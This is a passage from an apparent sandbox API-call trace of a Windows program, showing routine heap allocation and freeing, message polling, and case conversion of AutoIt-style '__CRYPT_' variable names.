1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0096.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0096.429] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.429] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0096.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0096.429] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.430] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.430] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.430] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0096.431] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0096.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0096.432] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.432] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0096.432] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0096.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0096.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca010 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.433] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f80 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0096.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0096.434] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.434] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0096.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0096.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca088 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0096.435] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.435] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0096.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0096.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fe0 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.436] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.437] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.437] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0096.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 